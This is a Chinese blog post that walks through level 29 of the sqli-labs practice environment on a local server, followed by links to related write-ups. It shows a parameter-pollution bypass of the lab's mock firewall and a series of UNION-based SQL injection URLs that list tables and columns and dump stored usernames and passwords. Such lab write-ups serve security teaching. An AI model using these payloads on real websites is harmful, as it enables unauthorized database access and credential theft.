sqli-labs (less-29)

最新推荐文章于 2023-11-28 19:38:12 发布
最新推荐文章于 2023-11-28 19:38:12 发布
阅读量682 收藏 1
点赞数 2
分类专栏: sqli-labs 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/114763700
版权

sqli-labs (less-29)

进入29关,输入ID=1

输入

http://127.0.0.1/sql1/Less-29/?id=1' #回显错误


根据错误显示,判断闭合方式为’–+,但是这里不就跟less-1一模一样了吗,我们打开less-29的源文件看看,发现不只一个页面

我们输入

http://127.0.0.1/sql1/Less-29/login.php?id=1


输入

http://127.0.0.1/sql1/Less-29/login.php?id=1'


这里意思为WAF防火墙成功阻挡了本次攻击,那是不是不存在SQL注入漏洞了呢,当然不是,我们想办法绕过WAF就行了

http://127.0.0.1/sql1/Less-29/login.php?id=1&id=2

这里我们在ID后面输入id=1&id=2,网站到底会去执行哪个ID呢,这里需要看我们使用的web容器,如果我们使用的web容器为apache,则会执行id=2,如果为tomcat,则会执行id=1,这里我的web容器为apache,所以会执行id=2

http://127.0.0.1/sql1/Less-29/login.php?id=1&id=2' #回显错误


根据错误信息判断闭合方式为’–+,并且为字符型注入

确定回显位置

http://127.0.0.1/sql1/Less-29/login.php?id=1&id=-2' union select 1,2,3--+


查看当前库

http://127.0.0.1/sql1/Less-29/login.php?id=1&id=-2' union select 1,2,database()--+


查看security库下的所有表

http://127.0.0.1/sql1/Less-29/login.php?id=1&id=-2' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+


查看users表下的所有字段

http://127.0.0.1/sql1/Less-29/login.php?id=1&id=-2' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')--+


查看username,password字段的所有值

http://127.0.0.1/sql1/Less-29/login.php?id=1&id=-2' union select 1,2,(select group_concat(concat_ws('~',username,password)) from security.users)--+

super 硕
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【愚公系列】2023年05月 Web渗透测试之SQL注入(sqli-labsLess-29-31)
时光隧道
08-02 4万+
SQL注入是一种常见的攻击方式,它利用应用程序未对用户输入的数据进行正确的过滤和验证,以达到访问或篡改系统数据的目的。具体来说,攻击者可以在注入点上构造恶意的SQL语句,并成功提交给数据库执行,从而造成数据泄露、篡改或者破坏。SQL注入攻击的应用场景非常广泛,常见于Web应用、数据库应用或其他需要使用SQL语句进行数据操作的应用中。
(手工)【sqli-labs29-31】参数污染、报错回显、WAF报错跳转、字符型注入
07-14 485
【SQL-WAF报错页面跳转】
SQLi LABS Less-29 联合注入
热门推荐
wangyuxiang946的博客
08-16 1万+
salilabs29,SQLi-LABS第29关使用GET请求提交参数,在url中构造payload即可
SQLi-LABS Less-29到Less-31
m0_64898960的博客
05-01 100
Less-29题目 Less-29的题目提到了WAF,看题目的意思应该是一个保护网站的东西 百度了一下 WAF就是Web Application Firewall,主要功能是拦截入侵尝试,比如SQL Injection, XSS, 路径遍历, 窃取敏感数据,CC攻击等。 就是说这个东西应该会拦截我们的SQL注入 开始尝试注入,发现一切太过简单… 百度过别人的做法之后,才知道这是双服务器,真正打开这题需要搭建jspstudy…但是比较麻烦… 也有简单的,正如其他博客写的一样,直接跳转到真正的注入页面…
Sqllibs-less29-31-WAF
Xor0ne
07-13 233
文章目录29.less29-Protection with WAF30.less30-Protection with WAF-Double Quotes31.less31-FUN with WAF 本文主要来自于:https://www.cnblogs.com/lcamry/category/846064.html 29.less29-Protection with WAF 参考链接:https://www.cnblogs.com/lcamry/p/5762952.html 首先先看下tomcat中的ind
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs靶场通关(Less-29~37)
qq_43381463的博客
01-29 102
sqli-labs靶场通关(Less-29~37)
SQLMAP脚本-sql-labs-Less-28-29
m0_69844818的博客
01-03 403
HTTP参数污染(HTTP Parameter Pollution) 攻击者通过在HTTP请求中插入特定的参数来发起攻击,如果Web应用中存在这样的漏洞,可以被攻击者利用来进行客户端或者服务器端的攻击。这个labs是一个HTTP参数污染所以也简单写就需要&连接一些就行了,想了解这东西的去搜索吧,这里教的是怎么写脚本提供思路。使用双写union绕过,编写cx.py脚本。忒忒后端代码,比28简单更多。一样的使用28的脚本即可拿下。
sqli-labs/Less-29
m0_71299382的博客
11-20 227
sqli-labs第二十九题
Sqli-labsLess-29和Less-30和Less-31
→_→
04-29 1080
Less-29 基于错误_GET_双服务器_单引号_字符型注入 服务器(两层)架构 注:截图等来自《MySQL注入天书:Less 29》 服务器端有两个部分:第一部分为 tomcat 为引擎的 jsp 型服务器,第二部分为 apache 为引擎的 php 服务器,真正提供 we...
sqli-labs进阶篇 29关~31关
Lucky小小吴的小屋
02-06 611
本文章主要讲述sqli-labs靶场第29关到32关的通关心得,从三方面讲述如何通关,分别是注入点判断、源码分析、注入过程。文章若有不恰当之处,望指出~~
sqli-labs靶场详解(less29-less31)
m0_72125469的博客
11-28 428
服务器端有两个部分:第一部分为 tomcat 为引擎的 jsp 型服务器,第二部分为 apache为引擎的 php 服务器,真正提供 web 服务的是 php 服务器。id=1&id=2'&id=4 返回第id=4的数据 id=2'也不报错 也不提示攻击失败。id=1&id=2' 不报错还查询出了结果 看来也是字符型 但是不是使用的单引号。id=1&id=2 返回id=2的数据id=1的数据不返回。
Sqli-labs靶场详细攻略Less 29-33
qq_41755084的博客
10-27 1534
这一关在web应用前有一个waf,在关卡列表界面直接点开是没有的,要在地址栏输入才是有waf保护的界面其实这里并不是真正的硬件waf,只是有两个函数模拟了waf的功能和收到参数的反应。sqlilabs靶场也提供了能够部署真正硬件waf的代码,不过随着时代的发展,waf也在变化,专门配置这样一个waf也没太有必要,直接使用这个模拟题目的就好了。这一关在正常配置waf的情况下,的结构图如下所示客户端在访问服务器端时,需要先经过一个tomcat服务器,这个tomcat服务器中部署的过滤代码充当了waf。
sqli-labs————Less-29
Fly_鹏程万里
05-19 833
Less-29从题目中可以了解到这个使用了WAF机制,那么我们可以看看该源文件内容:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3....
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码字段。攻击者可以通过在输入框中输入特定的字符串来尝试绕过认证。 如果您想深入学习SQL注入攻击技术,sqli-labs-less1可能是一个很好的练习平台。但请注意,这个平台是为了学术目的而设计的,不要在未授权的情况下尝试对任何真实的系统进行SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值